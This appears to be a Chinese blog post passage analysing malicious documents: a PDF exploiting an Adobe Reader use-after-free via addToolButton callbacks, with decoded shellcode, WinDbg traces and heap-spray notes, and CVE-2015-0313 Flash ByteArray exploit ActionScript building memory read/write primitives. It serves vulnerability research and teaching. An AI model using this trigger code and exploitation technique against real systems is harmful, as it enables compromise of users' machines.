-v, --version 　　　　　　 Shows program's version number.
-x, --xml　　　　　　　　 Shows the document information in XML format.

控制台中的命令:

PPDF> help

Documented commands (type help <topic>):
========================================
bytes　　　　 exit js_join quit set
changelog 　　 filters js_unescape rawobject show
create 　　 hash js_vars rawstream stream
decode　　 help log references tree
decrypt　　 info malformed_output replace vtcheck
embed　　 js_analyse metadata reset xor
encode 　　 js_beautify modify save xor_search
encode_strings 　　 js_code object save_version
encrypt　　 js_eval offsets sctest
errors 　　 js_jjdecode open search

加载pdf文档

root@kali:~# peepdf -i -f /root/Desktop/6776bda19a3a8ed4c2870c34279dbaa9.pdf
Warning: PyV8 is not installed!!

File: 6776bda19a3a8ed4c2870c34279dbaa9.pdf
MD5: 6776bda19a3a8ed4c2870c34279dbaa9
SHA1: ad6a3564e125683a791ee98c5d1e66e1d9c6877d
Size: 177511 bytes
Version: 1.1
Binary: False
Linearized: False
Encrypted: False
Updates: 0

查看pdf文档的object:

PPDF> object 1

<< /AcroForm << /Fields [ << /Parent 10 0 R
/Kids [ << /Ff 99999
/MK << /TP 1 >>
/Rect [ 0 0 0 0 ]
/FT /Btn
/T ImageField1[0]
/Subtype /Widget >> ]
/T SubFormNumberOne[0] >> ]
/XFA [ 10 0 R ] >>
/OpenAction 2 0 R
/Pages 2 0 R >>

使用js_jjdecode 解密JavaScript:

PPDF> js_jjdecode file /root/jj_encode.js

var shellcode = unescape("%u00E8%u0000%u5D00%uED83%uE905%u008B%u0000%u5052%uD231%uC031%uF980%u7501%u6604%uEBAD%uAC01%u003C%u0D74%u613C%u0272%u202C%uCAC1%u010D%uEBC2%u39E3%u58DA%uC35A%u8956%uB2DA%u313C%u66C0%u028B%uD801%u508B%u0178%u52DA%u8B51%u184A%u428B%u0120%u8BD8%u0138%u53DF%u1E8B%uF787%u3151%uE8C9%uFFAE%uFFFF%u5B59%uF787%u0275%u08EB%uC083%u4904%u22E3%uDFEB%u428B%u2918%u89C8%u8BC1%u2442%uD801%u8B66%u480C%u428B%u011C%uC1D8%u02E1%uC801%u008B%uD801%u0689%u5A59%uC683%uE204%u5EAE%u31C3%u64D2%u528B%u8B30%u0C52%u528B%uB114%u8B01%u28 ....................................................

分析js的 shellcode

js_jjdecode file /root/jj_encode.js $> decode

js_anaylze variable decode $> shellcode

show shellcode

使用sctest 分析shellcode的行为

sctest -v variable shellcode

2.分析恶意js中的触发漏洞的代码

代码很长,但触发漏洞就一点:
app.addToolButton({ cName: "evil", cExec: "1", cEnable: "addButtonFunc();" }); addButtonFunc = function() { app.addToolButton({cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();"}); } removeButtonFunc = function() { app.removeToolButton({cName: "evil"}); for (i=0;i < 10;i++) arr[i] = part1.concat(part2); }
先创建一个button,回调函数是addButtonFunc, 该函数创建一个子button,

子button中的回调函数销毁了父button, 此时又还对父对象引用,故触发UAF

加载到windbg后,再加载exp.pdf 断下:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08a8 ebx=00000001 ecx=05dbb3a8 edx=00201ddf esi=05dbb3a8 edi=00000000
eip=4a82f129 esp=002ef0dc ebp=002ef100 iopl=0 nv up ei pl zr ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210257
4a82f129 ?? ???
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesAdobeReader 11.0ReaderAcroRd32.dll -

查看栈:

0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
002ef0d8 65bde85d fea08b91 00000001 05dbb3a8 0x4a82f129
002ef100 65bde0d2 05da92e0 073ba7f8 05dbb3a8 AcroRd32_65a40000!DllCanUnloadNow+0x150536
002ef124 65c19743 77d96b7e 00000000 05261638 AcroRd32_65a40000!DllCanUnloadNow+0x14fdab
002ef138 65c22e07 00000000 002ef394 65aa8fdf AcroRd32_65a40000!CTJPEGDecoderRelease+0x2d613
002ef144 65aa8fdf 05da92e0 fea08905 00000000 AcroRd32_65a40000!CTJPEGDecoderRelease+0x36cd7
002ef394 65aa8091 fea08951 00000000 01227ac8 AcroRd32_65a40000!DllCanUnloadNow+0x1acb8
002ef3c0 65aa7ee7 00000000 fea08961 00000000 AcroRd32_65a40000!DllCanUnloadNow+0x19d6a
002ef3f0 65aa7c78 00000000 fea08ef5 00000000 AcroRd32_65a40000!DllCanUnloadNow+0x19bc0
002ef464 65aa7ac1 fea08e0d 00000000 01227ac8 AcroRd32_65a40000!DllCanUnloadNow+0x19951

对红色部分进行ub:

0:000> ub AcroRd32_65a40000!DllCanUnloadNow+0x150536
AcroRd32_65a40000!DllCanUnloadNow+0x150518:
65bde83f 897dfc mov dword ptr [ebp-4],edi
65bde842 ff96d0020000 call dword ptr [esi+2D0h]
65bde848 0fb7d8 movzx ebx,ax
65bde84b 8b06 mov eax,dword ptr [esi]
65bde84d 59 pop ecx
65bde84e 8bce mov ecx,esi
65bde850 66899ecc020000 mov word ptr [esi+2CCh],bx
65bde857 ff9064030000 call dword ptr [eax+364h]

0:000> !heap -p -a esi
address 0623c558 found in
_HEAP @ 2c90000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0623c550 0071 0000 [00] 0623c558 00370 - (busy)

然后
0:000> r esi
esi=0623c558
0:000> dd eax
0c0c08a8 4a848003 4a848003 4a848003 4a848003
0c0c08b8 4a848003 4a848003 4a848003 4a848003
0c0c08c8 4a848003 4a848003 4a848003 4a848003
0c0c08d8 4a848003 4a848003 4a848003 4a848003
0c0c08e8 4a848003 4a848003 4a848003 4a848003
0c0c08f8 4a848003 4a848003 4a848003 4a848003
0c0c0908 4a848003 4a848003 4a848003 4a848003
0c0c0918 4a848003 4a848003 4a848003 4a848003
0:000> dd esi
0623c558 0c0c08a8 41414141 41414141 41414141
0623c568 41414141 41414141 41414141 41414141
0623c578 41414141 41414141 41414141 41414141
0623c588 41414141 41414141 41414141 41414141
0623c598 41414141 41414141 41414141 41414141
0623c5a8 41414141 41414141 41414141 41414141
0623c5b8 41414141 41414141 41414141 41414141

esi是个对象, eax是其虚函数表指针, esi其eax都被劫持. 代码中正是调用了某虚函数才导致奔溃,因此利用heap spray 将shellcode喷射到[eax+364h]即可

.

分析漏洞利用的话,就需要结合exp和各种动态调试,静态逆向分析了.

CVE-2015-0313 Adobe Flash Player Workers ByteArray 释放重引用漏洞

`1.首先简单分析一下特殊的swf文件源码
ba.length = 0x1000 ba.shareable = true // 喷射vector.<object>到堆上，然后间隔释放产生内存空洞3 for (var i:uint = 0; i < ov.length; i++) { //ov的每个元素是vector,每个vector存储了ba对象和this指针 ov[i] = new Vector.<Object>(1014) // 1014=0x3f6 ov[i][0] = ba ov[i][1] = this } //间隔一个删除一个ov的vector对象 for (i = 0; i < ov.length; i += 2) delete(ov[i]) worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) //创建线程 mc = worker.createMessageChannel(Worker.current) //创建消息信道 mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)//设置回调函数 worker.setSharedProperty("mc", mc) worker.setSharedProperty("ba", ba) ApplicationDomain.currentDomain.domainMemory = ba // 设置ba为全局内存可访问 worker.start()
还有
private function workerThread():void { var ba:ByteArray = Worker.current.getSharedProperty("ba") var mc:MessageChannel = Worker.current.getSharedProperty("mc") ba.clear() // 清除ba，但domainMemory依然保留着对ba.buffer的引用 ov[0] = new Vector.<uint>(1022) // 1022（0x3FE）*4+8=0x1000，与ba同大小 mc.send("") while (mc.messageAvailable); // 下一个vector+(0x403-0x3FE)*4 -0x18 = 下一个vector起始地址， // 再减去0x1000（Vector对象大小），刚好就是ov[0][0]自身的内存地址 ov[0][0] = ov[0][0x403] - 0x18 - 0x1000 ba.length = 0x500000 var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000 var main:uint = ov[0][0x409] - 1 var vtable:uint = vector_read(main) vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8) // buffer内存清零 vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff) // 写入buffer的长度为0xFFFFFFFF mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString()) }
分析漏洞的思路和分析ie漏洞类似, 但是flash没有提供符号文件, 这时需要利用avmplus和source light 来帮助定位一些函数,操作

根据漏洞swf源码,主要分析ByteArray对象的clear之类的函数, domainMemory操作. 借用avmplus和ida找到其对应的汇编代码.

对byteArray清空的函数: flash32_16_0_0_257+0x66a743 (下载不到296这个版本,所以用随书文件的296替换下载的257并更名为257也可以正常使用)

操作domainMemory:flash32_16_0_0_257+0x69c659

0:019> u flash32_16_0_0_257+0x66a743
Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac93:
6697a743 895808 mov dword ptr [eax+8],ebx
6697a746 e838f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
6697a74b 8bce mov ecx,esi
6697a74d 885814 mov byte ptr [eax+14h],bl
6697a750 e82ef30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
6697a755 8bce mov ecx,esi
6697a757 89580c mov dword ptr [eax+0Ch],ebx
6697a75a e824f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)

0:019> ub flash32_16_0_0_257+0x66a743
Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac79:
6697a729 3bc3 cmp eax,ebx
6697a72b 740d je Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac8a (6697a73a)
6697a72d 8b0d84962767 mov ecx,dword ptr [Flash32_16_0_0_257!AdobeCPGetAPI+0x7580a4 (67279684)]
6697a733 8bd0 mov edx,eax
6697a735 e826f2f7ff call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x69eb0 (668f9960)
6697a73a 8bce mov ecx,esi
6697a73c e842f30800 call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x179fd3 (66a09a83)
6697a741 8bce mov ecx,esi

0:019> u flash32_16_0_0_257+0x69c659
Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cba9:
669ac659 8b442408 mov eax,dword ptr [esp+8]
669ac65d 894214 mov dword ptr [edx+14h],eax
669ac660 81feffffff7f cmp esi,7FFFFFFFh
669ac666 7605 jbe Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cbbd (669ac66d)
669ac668 beffffff7f mov esi,7FFFFFFFh
669ac66d 897218 mov dword ptr [edx+18h],esi
669ac670 e88bffffff call Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0x11cb50 (669ac600)
669ac675 8b4010 mov eax,dword ptr [eax+10h]

下条件记录断点:

bp Flash32_16_0_0_257+0x69c659 ".echo '=====globalmemory===';dd esp+8;gc"

bp flash32_16_0_0_257+0x66a743 ".if(poi(eax+0x10)==0x1000){.echo '====bytearrary buffer====';dd eax+8}.else{gc}"

'=====globalmemory==='
0267f518 07867000 00001000 065f1920 065762b8
0267f528 077a4040 6778c62d 077a4040 6778c904
0267f538 065f1920 065762b8 0776c180 0267f710
0267f548 67363dd4 065f1920 0660b020 0785d610
0267f558 0669bc80 67374f41 0778a020 065762b8
0267f568 0267f590 67374f4f 065f1920 6779ee7a
0267f578 0785d610 00000001 0267f5d8 00000000
0267f588 67374f41 077dcfb8 0267f640 0783d959
'====bytearrary buffer===='
06537238 07867000 00001000 00001000 00000000
06537248 2e777777 7263616d 64656d6f 632e6169
06537258 00006d6f 00000000 2e777777 7263616d
06537268 64656d6f 632e6169 00006d6f 00000000
06537278 67c82d40 00009c89 00000000 06542000
06537288 0000009a 00000000 6c696638 73726574
06537298 7274382c 66736e61 006d726f 00000000
065372a8 756c6176 2c664f65 74536f74 676e6972
eax=06537230 ebx=00000000 ecx=0769ff34 edx=00000000 esi=0769ff34 edi=0769ff10
eip=6775a743 esp=07b7f110 ebp=07b7f180 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
Flash32_16_0_0_257!IAEModule_IAEKernel_UnloadModule+0xeac93:
6775a743 895808 mov dword ptr [eax+8],ebx ds:0023:06537238=07867000

然后直接看swf源码的分析
查看全文

相关阅读:
Oracle中的4大空值处理函数用法举例
 PyCharm安装
 Python安装与环境变量的配置
 多层分组排序问题
 将时间点的数据变成时间段的数据
 根据状态变化情况，求最大值和最小值
 ubuntu 源码安装 swig
CSDN博客排名第一名，何许人也
 thinkPHP的常用配置项
 拔一拔 ExtJS 3.4 里你遇到的没遇到的 BUG（1）

原文地址：https://www.cnblogs.com/freesec/p/6435483.html